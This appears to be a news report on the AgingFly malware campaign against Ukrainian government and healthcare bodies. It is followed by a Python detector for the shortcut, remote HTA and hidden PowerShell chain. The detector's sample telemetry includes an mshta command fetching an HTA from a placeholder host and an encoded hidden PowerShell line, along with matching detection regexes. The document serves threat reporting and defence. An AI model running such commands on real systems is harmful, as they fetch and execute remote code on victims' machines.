A newly identified malware strain known as AgingFly has been used in cyberattacks targeting Ukrainian government entities and healthcare organisations, according to findings from Ukraine’s computer emergency response team.
The activity has been attributed to a threat cluster tracked as UAC-0247, which conducted multiple incidents between March and April 2026 against municipal authorities, hospitals, and emergency medical services.
The attacks begin with phishing emails that present themselves as humanitarian aid proposals. Recipients are prompted to click a link that leads to either a compromised legitimate website or a fake site designed to deliver malicious files.
After the initial interaction, victims download an archive containing a shortcut file that triggers a multi-stage infection chain. This process uses built-in Windows tools to execute a remote HTML application (HTA), display a decoy document, and install additional payloads without showing anything further to the user.
The final stage of the attack deploys AgingFly along with a supporting PowerShell script known as SilentLoop. AgingFly is written in C# and provides remote access capabilities, allowing attackers to execute commands, capture screenshots, log keystrokes, and download files from infected systems.
The malware communicates with its command server using encrypted WebSocket connections and retrieves instructions dynamically rather than storing them locally. This approach allows attackers to modify functionality during execution and complicates detection.
In parallel with deploying AgingFly, the attackers use additional tools to extract sensitive data. These include ChromElevator to collect credentials from Chromium-based browsers and ZapixDesk to access WhatsApp data.
Researchers reported that the campaign also involves reconnaissance and lateral movement within compromised networks. Attackers use tools such as RustScan for network scanning and tunnelling utilities to maintain access to infected environments.
In some cases, the activity extended beyond data theft. Investigators identified cryptocurrency mining software on compromised systems, indicating that the attackers also consumed the computing resources of infected machines after gaining initial access.
The campaign has also targeted individuals connected to Ukraine’s defence sector. In one instance, malicious files were distributed through the Signal messaging platform, disguised as legitimate software updates.
The origin of the threat group has not been publicly confirmed. Ukrainian authorities continue to monitor the activity and have issued recommendations to restrict the execution of certain file types and system utilities commonly used in the attack chain.
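The infection chain described above (shortcut file, built-in Windows tools, remote HTML application, hidden PowerShell loader) and the recommendation to restrict system utilities both point to the same detection opportunity: correlating process-creation events. The following is an added example, not code from the report or from CERT-UA, that runs simple chain-detection logic over a handful of constructed process-creation records. It assumes the remote HTML application is launched by `mshta.exe` and that the follow-on loader runs as hidden or encoded PowerShell; neither utility name is stated in the article, and the sample events, hostnames and encoded string are constructed placeholders.

```python
"""Flag process-creation events that match the shortcut -> remote HTA -> hidden PowerShell chain.

Added example. Assumptions not taken from the report: the remote HTML
application is hosted by mshta.exe, the loader stage is hidden/encoded
PowerShell, and events arrive as simplified Sysmon-style records ordered
by creation time. All sample data below is constructed.
"""
import re
from dataclasses import dataclass

# A remote HTA is identified by an http(s) URL on the mshta.exe command line.
REMOTE_URL = re.compile(r"https?://\S+", re.IGNORECASE)
# "-w hidden", "-WindowStyle hidden", "-e/-ec/-enc/-EncodedCommand <base64>".
HIDDEN_OR_ENCODED = re.compile(
    r"(?:^|\s)-(?:w(?:indowstyle)?\s+hidden|e(?:c|nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{16,})",
    re.IGNORECASE,
)
# A double-clicked shortcut file is started by the user's shell (explorer.exe).
USER_SHELL_PARENTS = {"explorer.exe"}


@dataclass(frozen=True)
class ProcEvent:
    pid: int
    ppid: int
    image: str
    command_line: str


def basename(path: str) -> str:
    """Lower-case file name of a Windows or POSIX path."""
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def flag_events(events):
    """Return {pid: [reasons]} for events matching the chain; empty dict if none match."""
    by_pid = {e.pid: e for e in events}
    findings: dict[int, list[str]] = {}
    for e in events:  # assumed ordered by creation time, so parents are seen first
        name = basename(e.image)
        parent = by_pid.get(e.ppid)
        reasons = []
        if name == "mshta.exe" and REMOTE_URL.search(e.command_line):
            reasons.append("mshta.exe running a remote HTML application")
        if name in ("powershell.exe", "pwsh.exe") and HIDDEN_OR_ENCODED.search(e.command_line):
            reasons.append("hidden or encoded PowerShell")
        # Add lineage context only to events that already matched a primary indicator.
        if reasons and parent is not None:
            pname = basename(parent.image)
            if pname in USER_SHELL_PARENTS:
                reasons.append("launched directly from the user shell (consistent with a shortcut file)")
            elif parent.pid in findings:
                reasons.append(f"child of already-flagged pid {parent.pid} ({pname})")
        if reasons:
            findings[e.pid] = reasons
    return findings


# Constructed sample telemetry: pid 1100 and 1200 form the malicious chain,
# 1300 is the decoy document being opened, 1400 is an unrelated admin command.
SAMPLE_EVENTS = [
    ProcEvent(1000, 500, r"C:\Windows\explorer.exe", "explorer.exe"),
    ProcEvent(1100, 1000, r"C:\Windows\System32\mshta.exe",
              "mshta.exe https://aid-proposal.invalid/offer.hta"),
    ProcEvent(1200, 1100, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              "powershell.exe -w hidden -enc QUFBQUFBQUFBQUFBQUFBQUFB"),
    ProcEvent(1300, 1100, r"C:\Program Files\Microsoft Office\WINWORD.EXE",
              '"WINWORD.EXE" C:\\Users\\u\\Downloads\\decoy.docx'),
    ProcEvent(1400, 2000, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              "powershell.exe Get-Process"),
]

if __name__ == "__main__":
    for pid, reasons in flag_events(SAMPLE_EVENTS).items():
        print(pid, "->", "; ".join(reasons))
```

The primary indicators (remote HTA, hidden or encoded PowerShell) are deliberately narrow so that ordinary administrative PowerShell is not flagged; the lineage reasons are what turn two isolated hits into one chain, which is the kind of correlation a blocking policy for shortcut files, HTA and script hosts is meant to make unnecessary in the first place.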
